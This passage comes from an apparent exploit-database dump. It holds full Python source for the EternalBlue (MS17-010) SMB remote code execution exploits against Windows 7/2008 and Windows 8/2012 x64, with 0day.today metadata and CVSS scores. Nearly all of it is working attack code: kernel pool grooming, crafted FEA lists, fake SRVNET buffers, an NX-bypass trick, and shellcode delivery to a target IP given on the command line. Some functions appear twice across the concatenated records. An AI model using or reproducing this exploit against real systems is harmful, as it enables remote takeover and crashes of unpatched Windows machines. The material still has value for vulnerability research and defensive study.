os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\r\n pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n conn.recvSMB() # must be success\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target\r\n# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)\r\ndef createConnectionWithBigSMBFirst80(target):\r\n # https://msdn.microsoft.com/en-us/library/cc246496.aspx\r\n # Above link is about SMB2, but the important here is first 4 bytes.\r\n # If using wireshark, you will see the StreamProtocolLength is NBSS length.\r\n # The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.\r\n #\r\n # After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.\r\n # srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.\r\n # Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.\r\n sk = socket.create_connection((target, 445))\r\n # For this exploit, use size is 0x11000\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0xfff7)\r\n # There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 7 \") or server_os.startswith(\"Windows Server 2008 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n \r\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/)\r\n # - SrvSmbNtTransaction() (smbtrans.c#L2677)\r\n # - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113)\r\n # - ExecuteTransaction() (smbtrans.c#L82)\r\n # - Call dispatch table (smbtrans.c#L347)\r\n # - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function)\r\n # - SrvSmbOpen2() (smbopen.c#L1002)\r\n # - call SrvOs2FeaListToNt() (smbopen.c#L1095)\r\n \r\n # https://msdn.microsoft.com/en-us/library/ee441720.aspx\r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n # Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT\r\n # Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, 2000, False)\r\n # we have to know what size of NtFeaList will be created when last fragment is sent\r\n \r\n # make sure server recv all payload before starting allocate big NonPaged\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # create buffer size NTFEA_SIZE-0x1000 at server\r\n # this buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # send echo again, all new 5 srvnet buffers should be created\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n # retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag\r\n if retStatus == 0xc000000d:\r\n print('good response status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode by closing srvnet connection\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/27802", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T23:01:39", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 8 / 2012 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27803", "href": "https://0day.today/exploit/description/27803", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 8 and 2012 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\nThe exploit support only x64 target\r\nTested on:\r\n- Windows 2012 R2 x64\r\n- Windows 8.1 x64\r\nDefault Windows 8 and later installation without additional service info:\r\n- anonymous is not allowed to access any share (including IPC$)\r\n- tcp port 445 if filtered by firewall\r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\r\nExploit info:\r\n- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\r\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\r\n- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\r\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\r\n- The exploit is likely to crash a target when it failed\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\nDisable NX method:\r\n- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\r\n- The exploit is also the same but we need to trigger bug twice\r\n- First trigger, set MDL.MappedSystemVa to target pte address\r\n - Write '\\x00' to disable the NX flag\r\n- Second trigger, do the same as Windows 7 exploit\r\n- From my test, if exploit disable NX successfully, I always get code execution\r\n'''\r\n \r\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\r\nNTFEA_SIZE = 0x9000\r\n \r\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\r\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\r\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\r\n \r\n'''\r\nReverse from srvnet.sys (Win2012 R2 x64)\r\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\r\n// size 0x90\r\nstruct SRVNET_BUFFER_HDR {\r\n LIST_ENTRY list;\r\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\r\n char unknown0[6];\r\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\r\n DWORD netRawBufferSize; // offset: 0x20\r\n DWORD ioStatusInfo;\r\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\r\n DWORD pad2;\r\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\r\n PMDL pmdl1; // point at offset 0x90 from this struct\r\n DWORD nByteProcessed; // 0x40\r\n char unknown4[4];\r\n QWORD smbMsgSize; // MUST be modified to size of all recv data\r\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\r\n QWORD pSrvNetWskStruct; // want to change to fake struct address\r\n DWORD unknown6; // 0x60\r\n char unknown7[12];\r\n char unknown8[0x20];\r\n};\r\nstruct SRVNET_BUFFER {\r\n char transportHeader[80]; // 0x50\r\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\r\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\r\n //MDL mdl1; // target\r\n};\r\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\r\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and \r\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\r\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\r\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\r\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\r\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\r\n# This value MUST be exactly same as the number of bytes we send.\r\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\r\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x90 (VOID*) : MDL.Next should be NULL\r\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x90 (VOID*) : MDL.Process should be NULL\r\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\r\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\r\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\r\n# \\x48\\x01\\xd1 add rcx, rdx\r\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\r\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode\r\n \r\n# Note: feaList will be created after knowing shellcode size.\r\n \r\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\r\n# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808\r\n# NX bit is at 0xfffff6ffffffe80f\r\n# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790\r\nfakeSrvNetBufferX64Nx = '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa\r\n \r\nfeaListNx = pack('<I', 0x10000)\r\nfeaListNx += ntfea9000\r\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\ndef createFakeSrvNetBuffer(sc_size):\r\n # 0x200 is size of fakeSrvNetBufferX64\r\n totalRecvSize = 0x80 + 0x200 + sc_size\r\n fakeSrvNetBufferX64 = '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\r\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\r\n return fakeSrvNetBufferX64\r\n \r\ndef createFeaList(sc_size):\r\n feaList = pack('<I', 0x10000)\r\n feaList += ntfea9000\r\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\r\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\r\n # stop copying by invalid flag (can be any value except 0 and 0x80)\r\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n return feaList\r\n \r\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00e00\r\n# offset 0x50: KSPIN_LOCK\r\n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL.\r\n# offset 0x110: array of pointer to function\r\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\r\n# some useful offset\r\n# offset 0x120: arg1 when invoking ptr to function\r\n# offset 0x128: arg2 when invoking ptr to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = ('\\x00'*16)*5\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\r\nfake_recv_struct += ('\\x00'*16)*10\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array\r\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\r\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', size) + '\\x00'*20\r\n pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n 